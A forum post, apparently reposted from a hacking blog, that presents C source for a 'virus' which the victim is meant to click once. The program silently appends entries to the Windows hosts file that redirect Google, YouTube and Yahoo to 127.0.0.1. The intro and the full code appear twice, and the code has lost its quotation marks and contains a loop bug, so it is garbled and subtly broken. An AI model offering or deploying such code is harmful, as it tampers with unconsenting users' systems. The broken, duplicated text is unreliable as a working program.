Herbalist Dr MziziMkavu
JF-Expert Member
- Feb 3, 2009
- 42,316
- 33,125
A Virus Program to Block Websites
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual Ill use my favorite programming language C to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.This virus has been
exclusively created in C. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, itll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is
not just confined to IEor Firefox. So once blocked, the site will not appear in any of the browser program.
Here is the sourcecode of the virus.
How to Compile ?For step-by-step compilation guide, refer my post How to compile C Programs.Testing1. To test, run the compiled module. It will block the sites that is listed in the source code.2. Once you run the file block_Site.exe, restart your
browser program. Then, type the URL of the blocked site and youll see the browser showing error
Page cannot displayed.3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named hosts using the notepad.At the bottom of the opened file youll see something like this
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual Ill use my favorite programming language C to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.This virus has been
exclusively created in C. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus needs to be clicked only once by the victim. Once it is clicked, itll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-installs the operating system. This blocking is
not just confined to IEor Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post
How to Block a Website ?
How to Block a Website ?
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h>char site_list[6][30]={
google.com,
www.google.com,
youtube.com,
www.youtube.com,
yahoo.com,
www.yahoo.com
};
char ip[12]=127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(C:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(C:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(D:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(D:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(E:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(E:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(F:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(F:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,\n);
for(i=0;i<6;i++)
fprintf(target,%s\t%s\n,ip,site_list);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
#include<dos.h>
#include<dir.h>char site_list[6][30]={
google.com,
www.google.com,
youtube.com,
www.youtube.com,
yahoo.com,
www.yahoo.com
};
char ip[12]=127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(C:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(C:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(D:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(D:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(E:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(E:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
done=findfirst(F:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(F:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,\n);
for(i=0;i<6;i++)
fprintf(target,%s\t%s\n,ip,site_list);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?For step-by-step compilation guide, refer my post How to compile C Programs.Testing1. To test, run the compiled module. It will block the sites that is listed in the source code.2. Once you run the file block_Site.exe, restart your
browser program. Then, type the URL of the blocked site and youll see the browser showing error
Page cannot displayed.3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named hosts using the notepad.At the bottom of the opened file youll see something like this
127.0.0.1google.com
5. Delete all such entries which contain the names of blocked sites.